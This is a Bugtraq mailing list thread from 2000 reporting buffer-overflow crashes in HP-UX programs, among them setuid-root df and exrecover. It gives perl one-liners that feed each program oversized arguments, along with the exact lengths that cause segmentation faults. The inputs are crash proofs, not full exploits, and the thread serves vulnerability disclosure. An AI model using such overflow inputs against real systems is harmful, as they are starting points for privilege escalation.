Bugtraq mailing list archives
Re: Possible vulnerability in HPUX ( Add vulnerability List )
From: ??? <loveyou () hackerslab org>
Date: Thu, 10 Aug 2000 13:36:50 +0900
Hi.. SYSTEM : HP-UX neptune B.11.00 A 9000/785 Memory fault vaulnerability list --------------------------------- /usr/bin/cancel `perl -e 'print "x" x 6080'` -ua Memory fault /bin/lpstat `perl -e 'print "x" x 185'` Memory fault $ kermit -y `perl -e 'print "x" x 5085'` [/home/loveyou] C-Kermit>q Memory fault(coredump) $ kermit -x `perl -e 'print "x" x 222'` Executing /usr/share/lib/kermit/ckermit.ini for UNIX... Good Evening. Memory fault(coredump) /usr/sbin/swinstall -s `perl -e 'print "x" x 5085'` /usr/sbin/swpackage -x `perl -e 'print "x" x 5085'` Memory fault /usr/sbin/swcopy -s `perl -e 'print "x" x 5085'` /usr/sbin/swask -s `perl -e 'print "x" x 5000'` /usr/dt/bin/dtterm -tn `perl -e 'print "x" x 1019'` /bin/rlogin `perl -e 'print "x" x 17080'` -l loveyou :-) by loveyou ( loveyou () hackerslab org ) ----- Original Message ----- From: "Quentin GIORGI" <qgiorgi () SANCERRE GRENOBLE HP COM> To: <BUGTRAQ () SECURITYFOCUS COM> Sent: Wednesday, August 09, 2000 4:31 PM Subject: Possible vulnerability in HPUX
Hello, Few days ago i read the mail [ Hackerslab bug_paper ] HP-UX bdf -t option buffer overflow vul. And decided to see any other possible vulnerability(ies) on my ststem. (HP-UX 10.20). After a *few* minutes ( maybe a little more :) ),trying each setuid exe with different options, i finally got results as for bdf: My basic knowledge tells me that it could be exploitable, but as i am not a PA RISC assembly expert, i let anyone decide. I have a quick query on the database vulnerability and can't see anything about this on HPUX, but... df: --- sancerre: /home/qgiorgi>ll `which df` -r-sr-xr-x 1 root bin 69632 Jun 10 1996 /usr/bin/df sancerre: /home/qgiorgi>df -F `perl -e "print 't'x3631"` df: ttt <skip> ttt : No such file or directory usage : df [-F FStype] [-V] [-egiklnvfb] [-t|-P] [-o specific_options] [special | directory ...] sancerre: /home/qgiorgi>df -F `perl -e "print 't'x3632"` Segmentation fault exrecover: -------- sancerre: /home/qgiorgi>ll `which exrecover` -r-sr-xr-x 1 root bin 20480 May 30 1996 /usr/lbin/exrecover sancerre: /home/qgiorgi>exrecover anythingUwant `perl -e "print 't'x4703"` File not found sancerre: /home/qgiorgi>exrecover anythingUwant `perl -e "print 't'x4704"` Segmentation fault And eventually, but it is owned by uucp i think it's less interesting. uusub: ----- sancerre: /home/qgiorgi>ll `which uusub` -r-sr-xr-x 1 uucp bin 32768 May 30 1996 /usr/lib/uucp/uusub sancerre: /home/qgiorgi>uusub -a `perl -e "print 't'x212"` sancerre: /home/qgiorgi> sancerre: /home/qgiorgi>uusub -a `perl -e "print 't'x213"` Segmentation fault I also try this onHPUX 11.00 (9911) uusub works with length of 225 exrecover works with length > 2700 I hope this could help. --------------------------------------------------------------------------- Quentin GIORGI Network Engineer E.I.C IDA ---------------------------------------------------------------------------
Current thread:
- Re: Possible vulnerability in HPUX ( Add vulnerability List ) ??? (Aug 10)